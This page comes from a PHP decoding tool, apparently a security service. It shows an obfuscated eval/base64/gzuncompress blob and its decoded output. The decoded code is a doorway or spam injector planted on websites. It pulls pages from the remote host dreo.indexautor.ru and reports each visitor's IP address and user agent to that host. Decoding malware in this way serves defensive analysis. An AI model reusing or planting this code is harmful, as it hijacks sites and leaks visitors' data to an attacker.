Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? eval(gzuncompress(base64_decode('eF6lV21v2kgQ/gy/YmMh2ZwIgdy11xLlWgROw4mEHDG9ntLIcs0a3B..
Decoded Output download
error_reporting(0);
setcookie('c', 1);
$myHost = "dreo.indexautor.ru"; $pathOnMyHost = ""; $pathToDor = "webstat"; $template = '!!!android_251114_out_61'; $connect = 0;
$path = substr($_SERVER['REQUEST_URI'], strlen($pathToDor));
$html = getContent($myHost, $pathOnMyHost.$path, $template,$pathToDor);
if (strstr($path, ".css")) header('Content-Type: text/css; charset=utf-8');
else if (strstr($path, ".png")) header('Content-Type: image/png');
else if (strstr($path, ".jpg") || strstr($path, ".jpeg")) header('Content-Type: image/jpeg');
else if (strstr($path, ".gif")) header('Content-Type: image/gif');
else if (strstr($path, ".ico")) header("Content-type: image/x-icon");
else if (strstr($path, ".xml")) header ('Content-type: text/xml; charset=utf-8');
else if (strstr($path, ".txt")) header('Content-Type: text/plain; charset=utf-8');
else if (strstr($path, ".js")) header('Content-Type: text/javascript; charset=utf-8');
else if (strstr($path, "rss")) header ('Content-type: text/xml; charset=utf-8');
else header('Content-Type: text/html; charset=utf-8');
echo($html);
function getContent($host, $path, $template, $pathToDor) {
global $connect, $pathOnMyHost;
if ($connect) {
$headers = array(
"User-Agent: $template"
."|$pathToDor"
."|$pathOnMyHost"
."|http://".$_SERVER['HTTP_HOST']
."|".getUserIP()
."|".$_SERVER['HTTP_USER_AGENT'],
"Referer: http://".$_SERVER['HTTP_HOST']
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://'.$host.$path);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15 );
curl_setopt($ch, CURLOPT_TIMEOUT, 15 );
$result = curl_redir_exec( $ch );
curl_close($ch);
return $result;
} else {
$buff = '';
$socket = @fsockopen($host, 80, $errno, $errstr);
if ($socket) {
@fputs($socket, "GET {$path} HTTP/1.0
");
@fputs($socket, "Host: {$host}
");
@fputs($socket, "Referer: http://".$_SERVER['HTTP_HOST']."
");
@fputs($socket, "User-Agent: $template"
."|$pathToDor"
."|$pathOnMyHost"
."|http://".$_SERVER['HTTP_HOST']
."|".getUserIP()
."|".$_SERVER['HTTP_USER_AGENT']
."
"
);
@fputs($socket, "Connection: close
");
while (!@feof($socket)) {
$buff .= @fgets($socket, 128);
}
@fclose($socket);
$result = explode("
", $buff, 2);
if (preg_match("~Location: (.*)~", $result[0], $m)) {
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")."GMT");
header("HTTP/1.1 301 Moved Permanently");
header("Location: ".str_replace($pathOnMyHost, '', $m[1]));exit;
}
return $result[1];
} else return "";
}
}
function getUserIP() {
$array = array('HTTP_X_REAL_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR', 'HTTP_X_REMOTECLIENT_IP');
foreach($array as $key)
if(filter_var($_SERVER[$key], FILTER_VALIDATE_IP)) return $_SERVER[$key];
return false;
}
function curl_redir_exec($ch) {
global $pathOnMyHost;
static $curl_loops = 0;
static $curl_max_loops = 20;
if ($curl_loops >= $curl_max_loops) {
$curl_loops = 0;
return FALSE;
}
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
list($header, $data) = explode("
", $data, 2);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 301 || $http_code == 302) {
$matches = array();
preg_match("~Location:(.*?)(?:
|$)~", $header, $matches);
$url = @parse_url(trim(array_pop($matches)));
if (!$url) {
$curl_loops = 0;
return $data;
}
$last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];
if (!$url['host']) $url['host'] = $last_url['host'];
if (!$url['path']) $url['path'] = $last_url['path'];
$new_url = $url['path'] . ($url['query']?'?'.$url['query']:'');
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")."GMT");
header("HTTP/1.1 301 Moved Permanently");
header("Location: ".str_replace($pathOnMyHost, '', $new_url));exit;
} else {
$curl_loops=0;
return $data;
}
}
Did this file decode correctly?
Original Code
<? eval(gzuncompress(base64_decode('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'))); ?>
Function Calls
gzuncompress | 1 |
base64_decode | 1 |
Stats
MD5 | 2779c8e8ae602e7d296fea6f48a17739 |
Eval Count | 1 |
Decode Time | 90 ms |